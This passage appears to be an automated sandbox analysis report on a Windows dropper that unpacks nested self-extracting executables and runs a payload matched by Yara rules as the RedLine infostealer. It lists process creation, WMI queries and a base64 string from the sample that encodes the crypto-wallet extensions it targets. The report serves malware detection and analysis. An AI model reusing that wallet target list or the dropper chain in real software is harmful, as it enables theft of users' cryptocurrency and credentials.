00000006.00000002.370107810.0000000003753000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000036D5000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.000000000382D000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.0000000003736000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000036B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, fcC6215.exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
                            Source: bRz07Kk.exe, 00000006.00000002.370107810.0000000003810000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000035A4000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.000000000290B000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.00000000027ED000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.000000000388E000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.000000000287A000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.0000000003658000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002760000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.00000000026D4000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.000000000363B000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.0000000003753000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000036D5000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.000000000382D000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.0000000003736000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000036B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: 3.3.gOk22TE.exe.4c0bc20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 3.3.gOk22TE.exe.4c0bc20.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 6.0.bRz07Kk.exe.1e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 3.3.gOk22TE.exe.4c0bc20.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 3.3.gOk22TE.exe.4c0bc20.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 6.0.bRz07Kk.exe.1e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00051F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00051F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeCode function: 1_2_00021F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00021F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeCode function: 2_2_00101F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_00101F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeCode function: 3_2_010E1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,3_2_010E1F90
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00053BA20_2_00053BA2
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00055C9E0_2_00055C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeCode function: 1_2_00023BA21_2_00023BA2
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeCode function: 1_2_00025C9E1_2_00025C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeCode function: 2_2_00103BA22_2_00103BA2
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeCode function: 2_2_00105C9E2_2_00105C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeCode function: 3_2_010E3BA23_2_010E3BA2
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeCode function: 3_2_010E5C9E3_2_010E5C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeCode function: 6_2_00AEF7C86_2_00AEF7C8
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeCode function: 6_2_00AEF3686_2_00AEF368
                            Source: file.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 813096 bytes, 2 files, at 0x2c +A "gck46uD.exe" +A "fcC6215.exe", ID 1810, number 1, 31 datablocks, 0x1503 compression
                            Source: gck46uD.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 586422 bytes, 2 files, at 0x2c +A "gDR79xP.exe" +A "dEX81lT.exe", ID 1855, number 1, 25 datablocks, 0x1503 compression
                            Source: gDR79xP.exe.1.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 395332 bytes, 2 files, at 0x2c +A "gOk22TE.exe" +A "ckg5133.exe", ID 1791, number 1, 17 datablocks, 0x1503 compression
                            Source: gOk22TE.exe.2.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 50180 bytes, 2 files, at 0x2c +A "aWM14.exe" +A "bRz07Kk.exe", ID 1685, number 1, 6 datablocks, 0x1503 compression
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMelatonin@ vs file.exe
                            Source: file.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                            Source: C:\Users\user\Desktop\file.exeSection loaded: sfc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeSection loaded: sfc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeSection loaded: sfc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeSection loaded: sfc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeSection loaded: sfc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeSection loaded: sfc.dllJump to behavior
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fcC6215.exe CEB59E6DDD127FCC56E7DCA136002B8552290A954C92DD565706C4DC472BAD17
                            Source: file.exeVirustotal: Detection: 56%
                            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00051F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00051F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeCode function: 1_2_00021F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00021F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeCode function: 2_2_00101F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_00101F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeCode function: 3_2_010E1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,3_2_010E1F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\aWM14.exe.logJump to behavior
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/10@0/1
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0005597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_0005597D
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0005597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_0005597D
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeCode function: 4_2_00007FFBACE21B10 ChangeServiceConfigA,4_2_00007FFBACE21B10
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            Source: bRz07Kk.exe.3.dr, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                            Source: 6.0.bRz07Kk.exe.1e0000.0.unpack, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00054FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00054FE0
                            Source: C:\Users\user\Desktop\file.exeCommand line argument: Kernel32.dll0_2_00052BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeCommand line argument: Kernel32.dll1_2_00022BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeCommand line argument: Kernel32.dll2_2_00102BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeCommand line argument: Kernel32.dll3_2_010E2BFB
                            Source: C:\Users\user\Desktop\file.exeAutomated click: OK
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeAutomated click: OK
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeAutomated click: OK
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
